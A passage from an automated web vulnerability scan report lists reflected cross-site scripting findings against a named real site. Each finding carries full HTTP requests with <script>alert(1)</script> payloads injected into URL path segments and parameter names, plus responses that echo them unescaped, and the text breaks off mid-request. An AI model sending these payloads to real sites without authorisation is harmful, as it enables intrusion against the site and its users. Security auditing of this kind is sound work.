GET /detail/8/themes/kosmos/images/?3d273<script>alert(1)</script>b17a917daa1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/?3d273<script>alert(1)</script>b17a917daa1=1 was not found on this server.</p>
...[SNIP]...

2.3676. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2200e<script>alert(1)</script>8c1de43327f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2200e<script>alert(1)</script>8c1de43327f/8/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2200e<script>alert(1)</script>8c1de43327f/8/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3677. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be435<script>alert(1)</script>34720c55fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8be435<script>alert(1)</script>34720c55fd/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8be435<script>alert(1)</script>34720c55fd/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3678. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9e04a<script>alert(1)</script>82e00c912e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes9e04a<script>alert(1)</script>82e00c912e4/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes9e04a<script>alert(1)</script>82e00c912e4/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3679. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 36a17<script>alert(1)</script>4ea1be5d94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos36a17<script>alert(1)</script>4ea1be5d94/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos36a17<script>alert(1)</script>4ea1be5d94/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3680. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 15556<script>alert(1)</script>cbce5bcd764 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images15556<script>alert(1)</script>cbce5bcd764/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images15556<script>alert(1)</script>cbce5bcd764/rating/ was not found on this server.</p>
...[SNIP]...

2.3681. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload aee2c<script>alert(1)</script>8cd2c17038c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/ratingaee2c<script>alert(1)</script>8cd2c17038c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/ratingaee2c<script>alert(1)</script>8cd2c17038c/ was not found on this server.</p>
...[SNIP]...

2.3682. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cf022<script>alert(1)</script>f358d897753 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/rating/?cf022<script>alert(1)</script>f358d897753=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/?cf022<script>alert(1)</script>f358d897753=1 was not found on this server.</p>
...[SNIP]...

2.3683. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5a4af<script>alert(1)</script>c464e4d9e02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5a4af<script>alert(1)</script>c464e4d9e02/8/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5a4af<script>alert(1)</script>c464e4d9e02/8/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3684. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4b9a6<script>alert(1)</script>7dfd74e133c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/84b9a6<script>alert(1)</script>7dfd74e133c/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/84b9a6<script>alert(1)</script>7dfd74e133c/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3685. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 222c5<script>alert(1)</script>c86fa0c1eaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes222c5<script>alert(1)</script>c86fa0c1eaf/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes222c5<script>alert(1)</script>c86fa0c1eaf/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3686. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b2ffc<script>alert(1)</script>43cb06f5543 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmosb2ffc<script>alert(1)</script>43cb06f5543/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmosb2ffc<script>alert(1)</script>43cb06f5543/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3687. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9623e<script>alert(1)</script>fb273ecd471 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images9623e<script>alert(1)</script>fb273ecd471/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images9623e<script>alert(1)</script>fb273ecd471/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3688. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b2655<script>alert(1)</script>118c123c155 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/ratingb2655<script>alert(1)</script>118c123c155/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/ratingb2655<script>alert(1)</script>118c123c155/0.gif was not found on this server.</p>
...[SNIP]...

2.3689. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload cc25a<script>alert(1)</script>6e8ab6e8ee3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/rating/0.gifcc25a<script>alert(1)</script>6e8ab6e8ee3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/0.gifcc25a<script>alert(1)</script>6e8ab6e8ee3 was not found on this server.</p>
...[SNIP]...

2.3690. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 921dc<script>alert(1)</script>3fab0dacefa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/rating/0.gif?921dc<script>alert(1)</script>3fab0dacefa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/0.gif?921dc<script>alert(1)</script>3fab0dacefa=1 was not found on this server.</p>
...[SNIP]...

2.3691. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8ce0<script>alert(1)</script>416fe3540af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile8ce0<script>alert(1)</script>416fe3540af/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile8ce0<script>alert(1)</script>416fe3540af/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3692. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc226<script>alert(1)</script>5c3c8f1c0dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8fc226<script>alert(1)</script>5c3c8f1c0dc/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8fc226<script>alert(1)</script>5c3c8f1c0dc/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3693. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12fd4<script>alert(1)</script>dfa38cc7b52 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes12fd4<script>alert(1)</script>dfa38cc7b52/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes12fd4<script>alert(1)</script>dfa38cc7b52/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3694. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b533f<script>alert(1)</script>fde8bb3f327 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmosb533f<script>alert(1)</script>fde8bb3f327/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
